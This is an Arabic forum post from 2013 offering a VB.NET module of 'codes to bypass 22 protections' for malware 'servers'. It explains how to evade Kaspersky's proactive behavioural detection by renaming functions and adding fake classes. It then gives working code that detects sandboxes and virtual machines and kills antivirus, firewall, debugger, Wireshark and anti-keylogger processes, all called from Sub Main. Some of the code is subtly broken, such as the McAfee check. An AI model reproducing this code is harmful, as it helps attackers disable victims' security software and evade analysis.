أكواد تخطي 22 حماية vb.net

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل

أكواد تخطي 22 حماية vb.net

مُساهمة  Mirin في السبت مارس 23, 2013 2:41 am

اقدم لكم
.
.
.
.
أكواد تخطي 22 حماية | | VB.NET

ديه حاجه بسيطة إلي كل من يعاني من الدفاع الاستباقي
{ في رأيي الخاص }
أن الدوت نت يتخطي الحمايات كلها واحده تلو الاخري بسهوله جدا
بس كل الفكرة أنك تكون متعلم لغة برمجه كويس
عشان تفهم انت بتعمل ايه , مش تطبيق فيديو وخلاص
=====================================
طيب انا هاشارك معاكم بشي بسيط

ماهو الدفاع الاستباقي للحمايات ؟؟

- الدفاع الأستباقي : هو تحليل سلوك البرنامج ( تحليل دواله - وظائفه - بياناته بالكامل )
اللي بيحصل انك بتطبق فيديو تشفير معين و تيجي تفحص السيرفر تلاقيه مشفر
ولكن عندما يتم تشغيل السيرفر , يقوم النظام الكشف للكاسبر مثلا بتحليل سلوك السيرفر و يقوم بإيقافه
حتي لو علي شي بسيط زي مثلا ان البرنامج (السيرفر ) مش مختوم بأمضاء شركة موثوقه
(has no digital signature)

و ساعتها ممكن نفكر في أكتر من شي لتخطي هذا الامر زي مثلا أضافه Fake classes and modules,
و تغيير أسماء الوظائف علي قد ما تقدر دون التأثير علي وظيفته
(renaming as many functions, subs and events used as possible )

و تحليل الدفاع الاستباقي للكاسبر يعتمد أساسا علي المواد التحليليه المعروفه كالـ :
- برامج خبيثة تحدث ضرر بجهاز الحاسب الخاص بك
- برامج خبيثة تسرق بيانات معينه من جهازك
- برامج خبيثةتتجسس علي جهازك
و هذا كله موجود طبعا في السيرفر ات ( و يعتمد أيضا لان السيرفرات في تكوينها تستخدم دوال API )

و بتغيير اسماء الدوال و الوظائف يقلل من نسبة كشف السيرفر من الدفاع الاستباقي بنسبة كبيرة جدا


كود:-
Module Antis
Dim Devices As Object, Grafikadapter As String, RegionA As String = "SELECT * FROM Win32_VideoController"
Dim regPID As RegistryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microso ft\Windows NT\CurrentVersion", False)
Dim pid As Object = regPID.GetValue("ProductId")
Dim id As String = "76487-337-8429955-22614"

Public Function antiKAV() As Boolean
On Error GoTo error1
If Process.GetProcessesByName("avp").Length >= 1 Then
Return True
Else
Return False
End If
Exit Function
error1:
End
End Function
Public Function antiSandboxie() As Boolean
On Error GoTo error1
If Process.GetProcessesByName("SbieSvc").Length >= 1 Then
Return True
Else
Return False
End If
Exit Function
error1:
End
End Function

Public Function antiAnubis() As Boolean
On Error GoTo error1
Dim folder As String = Application.StartupPath
Dim getFile As String = folder & "\sample.exe"
If Application.ExecutablePath = getFile Then
Return True
Else
Return False
End If
Exit Function
error1:
End
End Function

Public Function antiAnubis2() As Boolean
On Error GoTo error1
If pid = id Then
Return True
Else
Return False
End If
Exit Function
error1:
End
End Function

Public Function AntiVirtualBox() As Boolean
On Error GoTo error1
Call getDevices()

Select Case Grafikadapter
Case "VirtualBox Graphics Adapter"
Return True
Case Else
Return False
End Select
Exit Function
error1:
End
End Function

Public Function AntiVmWare() As Boolean
On Error GoTo error1
Call getDevices()

Select Case Grafikadapter
Case "VMware SVGA II"
Return True
Case Else
Return False
End Select
Exit Function
error1:
End
End Function

Public Function AntiVirtualPC() As Boolean
On Error GoTo error1
Call getDevices()

Select Case Grafikadapter
Case "VM Additions S3 Trio32/64"
Return True
Case Else
Return False
End Select
Exit Function
error1:
End
End Function
Sub AntiBitDefender()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "bdagent"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
Sub AntiZoneAlarm()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "zlclient"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
Sub AntiNOD32()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "egui"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
Sub AntiAvast()
Dim ktp As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To ktp.Length - 1
Select Case Strings.LCase(ktp(i).ProcessName)
Case "ashWebSv.exe"
ktp(i).Kill()
Case Else
End Select
Next
End Sub
Sub AntiAVG()
Dim ktp As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To ktp.Length - 1
Select Case Strings.LCase(ktp(i).ProcessName)
Case "avgemc.exe"
ktp(i).Kill()
Case Else
End Select
Next
End Sub
Sub AntiMcAfee()
Dim ktp As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To ktp.Length - 1
Select Case Strings.LCase(ktp(i).ProcessName)
Case "mcagent" & "mcuimgr"
ktp(i).Kill()
Case Else
End Select
Next
End Sub
Sub AntiClamAV()
Dim ktp As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To ktp.Length - 1
Select Case Strings.LCase(ktp(i).ProcessName)
Case "clamauto.exe"
ktp(i).Kill()
Case Else
End Select
Next
End Sub
Sub AntiComodo()
Dim ktp As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To ktp.Length - 1
Select Case Strings.LCase(ktp(i).ProcessName)
Case "cpf.exe"
ktp(i).Kill()
Case Else
End Select
Next
End Sub
Sub AntiKeyscrambler()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "keyscrambler"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
Sub AntiWireshark()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "wireshark"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
Sub AntiKaspersky()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "avp"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
Sub AntiMalwarebytes()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "mbam"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
Sub AntiOllydbg()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "ollydbg"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
Sub AntiOutpost()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "outpost"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
Sub AntiNorman()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "npfmsg"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
Private Sub getDevices()
On Error GoTo error1
Devices = GetObject("winmgmts:").ExecQuery(RegionA)
For Each AdaptList In Devices
Grafikadapter = AdaptList.Description
Next
Exit Sub
error1:
End
End Sub
End Module




, ويتم أستدعائهم كالتالي
في Sub Main

Call AntiBitDefender()
Call AntiMcAfee()
Call AntiNOD32()
Call AntiAVG()
Call AntiAvast()
Call antiAnubis()
Call antiAnubis2()
Call antiSandboxie()
Call AntiVirtualBox()
Call AntiVmWare()
Call AntiVirtualPC()
Call AntiZoneAlarm()
Call AntiClamAV()
Call AntiComodo()
Call AntiKeyscrambler()
Call AntiWireshark()
Call antiKAV()
Call AntiMalwarebytes()
Call AntiOllydbg()
Call AntiOutpost()
Call AntiNorman()

منقول من منظمة الهكر العربى

Mirin

المساهمات : 1
تاريخ التسجيل : 23/03/2013

معاينة صفحة البيانات الشخصي للعضو

الرجوع الى أعلى الصفحة اذهب الى الأسفل

استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى